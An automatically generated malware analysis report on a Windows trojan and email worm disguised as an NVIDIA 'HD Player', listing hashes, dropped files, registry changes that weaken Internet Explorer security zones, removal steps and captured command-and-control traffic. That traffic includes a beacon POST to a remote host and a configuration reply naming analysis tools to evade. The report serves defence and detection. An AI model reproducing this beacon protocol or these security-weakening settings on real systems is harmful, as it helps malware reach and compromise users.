Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0fe7961b5f32be76f5055d4431232e02
SHA1: 92a3ebcf1780ea861403ca2b84a2d26c25555ddb
SHA256: 9561630c4e4add89cd362dbd58ead4344df211384b1c4691b28a3553cc2a9aa5
SSDeep: 49152:p06Z8 CZahRQ6 z9vOkYlG4N iuaUIXiEu:f6ZahRQvzpOkYlG4N iuglu
Size: 3129344 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-10 09:35:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
attrib.exe:1392
The Trojan injects its code into the following process(es):
%original file name%.exe:1460
Mutexes
The following mutexes were created/opened:
AMResourceMutex2ZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_RasPbFileShimCacheMutex
File activity
The process %original file name%.exe:1460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
Registry activity
The process %original file name%.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 37 3C 47 42 D6 06 26 0C 91 3B FB 78 18 28 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process attrib.exe:1392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D1 E9 9D CF 6F 8E 01 CE E5 F8 1B 4E C4 77 3D"
Dropped PE files
MD5 | File path |
---|---|
7283299a80a0bcdd07ddb32efa4d0c2c | c:\WINDOWS\system\exdui.dll |
7283299a80a0bcdd07ddb32efa4d0c2c | c:\exdui.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
attrib.exe:1392
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: NVIDIA Corporation
Product Name: HD Player
Product Version: 2.3.1.3
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.3.1.3
File Description:
Comments:
Language: English (United States)
Company Name: NVIDIA CorporationProduct Name: HD Player Product Version: 2.3.1.3Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 2.3.1.3File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2175466 | 2179072 | 4.33883 | dc37bc87fd606900a922b91c28c4c8c3 |
.rdata | 2183168 | 469776 | 471040 | 4.88407 | 80d022cc38b23077c1210cee2e0c223b |
.data | 2654208 | 364017 | 90112 | 3.52306 | 0a032db0534453f043a5353cf0d63907 |
.rsrc | 3018752 | 383700 | 385024 | 1.55761 | 0c8967591a131031440442acbdae9df8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://sysn.applinzi.com/tool/get_date.php | |
hxxp://duapp.n.shifen.com/music/url.txt | |
hxxp://sysn.applinzi.com/now_set.php | |
hxxp://sysn.applinzi.com/calc_online/calc.php | |
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250273372 | |
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250 | |
hxxp://so.qh-lb.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº | |
hxxp://so.qh-lb.com/s?q=aaaçŸä¿¡è½°ç‚¸ | |
hxxp://www.a.shifen.com/s?wd=www.aaazha.com | |
hxxp://www.baidu.com/s?wd=AAA.......... | |
hxxp://www.baidu.com/s?wd=AAA........ | |
hxxp://www.so.com/s?q=aaaçŸä¿¡è½°ç‚¸ | 106.120.160.134 |
hxxp://www.db-ha.com/now_set.php | 220.181.136.41 |
hxxp://www.haosou.com/s?q=aaaçŸä¿¡è½°ç‚¸ | 125.88.193.243 |
hxxp://www.db-ha.com/calc_online/calc.php | 220.181.136.41 |
hxxp://www.haosou.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº | 125.88.193.243 |
hxxp://www.baidu.com/s?wd=www.aaazha.com | |
hxxp://www.db-ha.com/tool/get_date.php | 220.181.136.41 |
hxxp://www.so.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº | 106.120.160.134 |
hxxp://sysboom.duapp.com/music/url.txt | 220.181.7.172 |
www.sogou.com | 203.90.249.162 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /s?q=aaaçŸä¿¡è½°ç‚¸æœº HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 05 Oct 2016 23:17:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/
Set-Cookie: _S=lrev8rg26lsl3nqlf0cmfclrl3; expires=Wed, 05-Oct-2016 23:27:06 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tso_Anoyid=11147570942619424242; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/
6028..<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie6"><![endif]-->.<!--[if IE 7 ]><html class="ie7"><![endif]-->.<!--[if IE 8 ]><html class="ie8"><![endif]-->.<!--[if IE 9 ]><html class="ie9"><![endif]-->.<!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->.<head>.<meta charset="utf-8">.<meta content="always" name="referrer">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title>aaa..............._360......</title>.<link rel="dns-prefetch" href="//s0.qhimg.com">.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel="dns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" href="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">.<link rel="search" type="application/opensearchdescription xml" href="https://VVV.so.com/soopensearch.xml" title="360......">.<style type="text/css">body{background:#fff;color:#333;min-width:1000px;position:relative}body,th,td{font-family:arial}html,body,ul,ol,li,dl,dd,h1,h2,h3,h4,h5,h6,pre,form,input,button,textarea,p,th,td{margin:0;padding:0}p,form,ol,ul,li,h3,menu{list-style:none}table,img{border:0}img,object,select,input,textarea,button{vertical-align:middle}th{text-align:left}h1,h2,h3,h4,h5,h6,input,textarea,select,cite,em,i,b,strong,th{font-size:100%;font-style:normal}ins,s,u,del{text-decoration:none}em,cit
<<< skipped >>>
GET /s?wd=AAA.......... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:16:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1475709416; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=94; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu 0c86f471760cdece4b2b4178c12f7153
Cxy_ex: 1475709417 3663786690 d41d8cd98f00b204e9800998ecf8427e
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0x83a1b5c9000222bc
BDUSERID: 0
531e..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>AAA..............._............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}.c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backgrou
<<< skipped >>>
GET /s?wd=AAA........ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=94
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:16:58 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu a8c3b2015de22305f035b39cde82d80e
Cxy_ex: 1475709418 3663786690 1d1fc270c63b26659ac8d100bcebdc02
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xf93f43f50002128d
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=96; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
45e..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>AAA............_............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}..b40...c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backg
<<< skipped >>>
GET /s?wd=VVV.aaazha.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=96
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:17:12 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 79552b80398715448ddb86ba214bd7fd
Cxy_ex: 1475709432 3663786690 1d1fc270c63b26659ac8d100bcebdc02
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xa26cea7f000258a4
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=139; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
45e..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>VVV.aaazha.com_............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}...1680..c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backg
<<< skipped >>>
GET /tool/get_date.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/tool/get_date.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: VVV.db-ha.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:54 GMT
Content-Type: text/html
Content-Length: 19
Connection: keep-alive
Via: 10.13.144.188
2016-10-06 07:16:54HTTP/1.1 200 OK..Server: sae..Date: Wed, 05 Oct 2016 23:16:54 GMT..Content-Type: text/html..Content-Length: 19..Connection: keep-alive..Via: 10.13.144.188..2016-10-06 07:16:54....
GET /calc_online/calc.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/calc_online/calc.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: VVV.db-ha.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:56 GMT
Content-Type: text/html
Content-Length: 13
Connection: keep-alive
Via: 10.13.144.239
Set-Cookie: VGOTCN_OnLineCount=U36
[now]_81[now]HTTP/1.1 200 OK..Server: sae..Date: Wed, 05 Oct 2016 23:16:56 GMT..Content-Type: text/html..Content-Length: 13..Connection: keep-alive..Via: 10.13.144.239..Set-Cookie: VGOTCN_OnLineCount=U36..[now]_81[now]..
GET /s?q=aaaçŸä¿¡è½°ç‚¸ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; _S=lrev8rg26lsl3nqlf0cmfclrl3; tso_Anoyid=11147570942619424242
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 05 Oct 2016 23:17:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
6000..<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie6"><![endif]-->.<!--[if IE 7 ]><html class="ie7"><![endif]-->.<!--[if IE 8 ]><html class="ie8"><![endif]-->.<!--[if IE 9 ]><html class="ie9"><![endif]-->.<!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->.<head>.<meta charset="utf-8">.<meta content="always" name="referrer">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title>aaa............_360......</title>.<link rel="dns-prefetch" href="//s0.qhimg.com">.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel="dns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" href="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">.<link rel="search" type="application/opensearchdescription xml" href="https://VVV.so.com/soopensearch.xml" title="360......">.<style type="text/css">body{background:#fff;color:#333;min-width:1000px;position:relative}body,th,td{font-family:arial}html,body,ul,ol,li,dl,dd,h1,h2,h3,h4,h5,h6,pre,form,input,button,textarea,p,th,td{margin:0;padding:0}p,form,ol,ul,li,h3,menu{list-style:none}table,img{border:0}img,object,select,input,textarea,button{vertical-align:middle}th{text-align:left}h1,h2,h3,h4,h5,h6,input,textarea,select,cite,em,i,b,strong,th{font-size:100%;font-style:normal}ins,s,u,del{text-decoration:none}em,cite{f
<<< skipped >>>
POST /now_set.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/now_set.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Host: VVV.db-ha.com
Content-Length: 213
Cache-Control: no-cache
sos=1&key_1=94915c80f8a084lPl5M5y38K&key_2=10144f1e091b08bjK119WLVp4&ver=2.313&open=ooo2313&act=&md_sta=e656849a8c8c56f7f668f92d0182e6cb&time=2016-10-06 07:16:54&onlineF=1d8cf39371716fb36c6ecd85f2241433&dynasty=n6
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3881
Connection: keep-alive
Via: 10.13.144.188
[s1]SOFTWARE\Now_warks\[s1][s2]%WinDir%\system\WINSPLEDX[s2][s3]SOFTWARE\Now_warkO\[s3][s4]C:\Windows\show2.jpg[s4][s5]hXXp://VVV.db-ha.com/calc_online/calc.php[s5][s6]600000[s6][b1]%WinDir%\system\JspXmlFora.txt[b1][s14]SmartSniff|Fiddler|...............|Wireshark|Charles|WinSock Expert[s14][s15]999999999[s15][s17]C:\Windows\System\background_image.jpg[s17][s19]hXXp://n.aaazha.com/page/study/teaManager.html[s19][F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA,C2,[F1][F2]d2VibWFzdGVyQEhLNzE4MDk=[F2][F3]dsll=207[F3][F4]/WEB/D_Jk/[F4][F5]/WEB/D_ym_Jk/[F5][F6]1[F6][F7]1[F7][F8]5[F8][s20]C:\Windows\System\get_local_datum.txt[s20][dlyc]40000[dlyc][fzbyc]30000[fzbyc][jcmc]AAA...............[jcmc][sypost]3[sypost][xmlHttp_GetInfo]1[xmlHttp_GetInfo][xmlHttp_AddCode]1[xmlHttp_AddCode][GetFried]73[GetFried][upHelp]69[upHelp][back_url]hXXp://VVV.db-ha.com/back_list/content.txt[back_url][skype_url]hXXp://n.aaazha.com/page/study/skype.html[skype_url][admin_url]hXXp://VVV.baidu.com[admin_url][s21]54,32,02,ED,D5,B5,3C,E8,30,84,76,C2,5E,F4,02,16,35,87,15,E6,B7,D6,CE,[s21][s22]hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime[s22][min]1120[min][max]1500[max][p=obs]A3,A9,[obs][p=obp]25,7A,57,[obp][strcd]15[strcd][strbs]gnb*[strbs][getCoot]15[getCoot][senKet]8*66[senKet][sz166]1500[sz166][sz52k]10000[sz52k][mmd88]76.com[mmd88][objokj]baidu.com[objokj][de3]720000[de3][addBase]14[addBase][http-s]image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, ap
<<< skipped >>>
GET /music/url.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: sysboom.duapp.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 05 Oct 2016 23:16:54 GMT
Content-Type: text/html
Content-Length: 345
Connection: keep-alive
Set-Cookie: BAEID=61048F546A35CDB463F5F04B98D1F275; expires=Thu, 05-Oct-17 23:16:54 GMT; max-age=31536000; path=/; version=1
